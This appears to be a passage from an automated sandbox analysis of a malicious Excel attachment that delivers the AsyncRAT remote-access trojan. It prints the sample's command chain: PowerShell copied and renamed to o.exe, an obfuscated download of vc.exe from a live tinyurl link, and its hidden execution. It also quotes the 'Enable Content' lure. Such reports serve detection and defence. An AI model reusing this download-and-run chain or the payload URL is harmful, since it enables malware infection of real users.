Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://login.windows.local
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://management.azure.com
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://management.azure.com/
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://messaging.office.com/
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://ncus-000.contentsync.
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://ncus-000.pagecontentsync.
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://officeapps.live.com
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://onedrive.live.com
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://outlook.office.com
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://outlook.office365.com
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: o.exe, 0000000E.00000002.397281836.00000000055A8000.00000004.00000001.sdmp, o.exe, 0000000E.00000002.396819235.0000000005518000.00000004.00000001.sdmp	String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: o.exe, 0000000E.00000002.397102054.000000000554E000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://settings.outlook.com
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://store.office.com/addinstemplate
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://tasks.office.com
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://templatelogging.office.com/client/log
Source: o.exe, 0000000E.00000002.396745750.0000000005507000.00000004.00000001.sdmp	String found in binary or memory: https://tinyurl.com
Source: o.exe, 0000000E.00000002.395218460.0000000005212000.00000004.00000001.sdmp	String found in binary or memory: https://tinyurl.com/y3m5fwhq
Source: o.exe, 0000000E.00000002.396745750.0000000005507000.00000004.00000001.sdmp	String found in binary or memory: https://tinyurl.com4
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://wus2-000.contentsync.
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://wus2-000.pagecontentsync.
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: o.exe, 0000000E.00000002.397318016.00000000055BA000.00000004.00000001.sdmp, vc.exe.14.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://www.odwebp.svc.ms

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected AsyncRAT

Show sources

Source: Yara match	File source: 00000020.00000002.521796499.0000000002B41000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vc.exe PID: 4896, type: MEMORY

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Document image extraction number: 0	Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content"
Source: Document image extraction number: 0	Screenshot OCR: Enable Content"
Source: Document image extraction number: 1	Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content"
Source: Document image extraction number: 1	Screenshot OCR: Enable Content"

Found Excel 4.0 Macro with suspicious formulas

Show sources

Source: 1099008FEDEX_090887766.xls

Initial sample: EXEC

Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 14_2_01258D90
Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 14_2_01258C90
Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 14_2_01257732
Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 14_2_012590D0
Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 14_2_0337E830
Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 17_2_00EBCE60
Source: C:\Users\user\AppData\Roaming\vc.exe	Code function: 32_2_02ACE4A0
Source: C:\Users\user\AppData\Roaming\vc.exe	Code function: 32_2_02ACE4B0
Source: C:\Users\user\AppData\Roaming\vc.exe	Code function: 32_2_02ACC53C
Source: C:\Users\user\AppData\Roaming\vc.exe	Code function: 32_2_07232E61
Source: C:\Users\user\AppData\Roaming\vc.exe	Code function: 32_2_07232E70

Source: 1099008FEDEX_090887766.xls

OLE indicator, VBA macros: true

Source: C:\Windows\SysWOW64\Robocopy.exe

Process token adjusted: Security

Source: powershell.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: powershell.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: powershell.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: powershell.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\AppData\Roaming\vc.exe

Section loaded: amsidll.dll

Source: 1099008FEDEX_090887766.xls, type: SAMPLE

Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f

Source: vc.exe.14.dr

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: vc.exe.14.dr, u0006/u0006.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: vc.exe.14.dr, u0006/u0006.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: vc.exe.14.dr, u0006/u0006.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 32.2.vc.exe.780000.0.unpack, u0006/u0006.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 32.2.vc.exe.780000.0.unpack, u0006/u0006.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 32.2.vc.exe.780000.0.unpack, u0006/u0006.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 32.0.vc.exe.780000.0.unpack, u0006/u0006.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 32.0.vc.exe.780000.0.unpack, u0006/u0006.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 32.0.vc.exe.780000.0.unpack, u0006/u0006.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal96.troj.expl.evad.winXLS@31/25@2/2

Source: C:\Users\user\AppData\Local\Temp\o.exe

Code function: 14_2_012590D0 FormatMessageW,LocalFree,GetLastError,FormatMessageW,free,LocalFree,free,free,

Source: C:\Users\user\AppData\Local\Temp\o.exe

Code function: 14_2_0125C231 __EH_prolog3_GS,CoInitialize,CoCreateInstance,CoUninitialize,

Source: C:\Users\user\AppData\Local\Temp\o.exe

Code function: 14_2_0125D547 FindResourceExW,LoadResource,

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7164:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4308:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5076:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3564:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7148:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6072:120:WilError_01

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\{FE3D55F8-EE7F-4F13-A134-D11201796DC7} - OProcSessId.dat

Jump to behavior

Source: 1099008FEDEX_090887766.xls

OLE indicator, Workbook stream: true

Source: C:\Users\user\AppData\Local\Temp\o.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\o.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\o.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\vc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\Robocopy.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Users\user\AppData\Local\Temp\o.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: 1099008FEDEX_090887766.xls

ReversingLabs: Detection: 14%

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c robocopy %windir%\system32\WindowsPowerShell\v1.0\ %temp% powershell.exe /mt /z & exit
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c timeout /t 1 & cd %temp% & ren powershell.exe o.exe & exit
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%\o.exe -w 1 cd $env:temp; Start-Sleep 3; (get-item o.exe).Attributes += 'Hidden'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\Robocopy.exe robocopy C:\Windows\system32\WindowsPowerShell\v1.0\ C:\Users\user\AppData\Local\Temp powershell.exe /mt /z
Source: unknown	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%\o.exe -w 1 Start-Sleep 7; Move-Item 'vc.exe' -Destination '$env:appdata'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe;
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 7; Move-Item 'vc.exe' -Destination '$env:appdata'
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe;
Source: unknown	Process created: C:\Users\user\AppData\Roaming\vc.exe C:\Users\user\AppData\Roaming\vc.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c robocopy %windir%\system32\WindowsPowerShell\v1.0\ %temp% powershell.exe /mt /z & exit
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c timeout /t 1 & cd %temp% & ren powershell.exe o.exe & exit
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%\o.exe -w 1 cd $env:temp; Start-Sleep 3; (get-item o.exe).Attributes += 'Hidden'
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%\o.exe -w 1 Start-Sleep 7; Move-Item 'vc.exe' -Destination '$env:appdata'
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe;
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\Robocopy.exe robocopy C:\Windows\system32\WindowsPowerShell\v1.0\ C:\Users\user\AppData\Local\Temp powershell.exe /mt /z
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 7; Move-Item 'vc.exe' -Destination '$env:appdata'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe;
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process created: C:\Users\user\AppData\Roaming\vc.exe C:\Users\user\AppData\Roaming\vc.exe

Source: C:\Users\user\AppData\Local\Temp\o.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\o.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Source:	Binary string: powershell.pdbUGP source: o.exe, 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, o.exe, 00000010.00000002.390755683.0000000001251000.00000020.00020000.sdmp, o.exe, 00000011.00000000.252577603.0000000001251000.00000020.00020000.sdmp, powershell.exe.7.dr
Source:	Binary string: powershell.pdb source: o.exe, 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, o.exe, 00000010.00000002.390755683.0000000001251000.00000020.00020000.sdmp, o.exe, 00000011.00000000.252577603.0000000001251000.00000020.00020000.sdmp, powershell.exe.7.dr

Data Obfuscation:

Binary contains a suspicious time stamp

Show sources

Source: initial sample

Static PE information: 0x9203324E [Sat Aug 17 19:30:22 2047 UTC]

Obfuscated command line found

Show sources

Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')

Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 14_2_0125A58B push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 14_2_0125A239 push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 14_2_0337BE60 push es; ret
Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 14_2_0337BEA0 push es; ret
Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 14_2_0337BE80 push es; ret
Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 14_2_0337BEC2 push es; ret
Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 17_2_00EBC5E0 push es; ret
Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 17_2_00EBD9E0 push es; ret
Source: C:\Users\user\AppData\Roaming\vc.exe	Code function: 32_2_007A07D8 push es; ret
Source: C:\Users\user\AppData\Roaming\vc.exe	Code function: 32_2_072375E8 push E803B477h; iretd
Source: C:\Users\user\AppData\Roaming\vc.exe	Code function: 32_2_07237A05 push eax; ret

Source: initial sample

Static PE information: section name: .text entropy: 7.71178527327

Persistence and Installation Behavior:

Drops PE files to the document folder of the user

Show sources

Source: C:\Users\user\AppData\Local\Temp\o.exe

File created: C:\Users\user\Documents\vc.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\o.exe	File created: C:\Users\user\Documents\vc.exe			Jump to dropped file
Source: C:\Windows\SysWOW64\Robocopy.exe	File created: C:\Users\user\AppData\Local\Temp\powershell.exe			Jump to dropped file

Boot Survival:

Yara detected AsyncRAT

Show sources

Source: Yara match	File source: 00000020.00000002.521796499.0000000002B41000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vc.exe PID: 4896, type: MEMORY

Source: C:\Users\user\AppData\Local\Temp\o.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
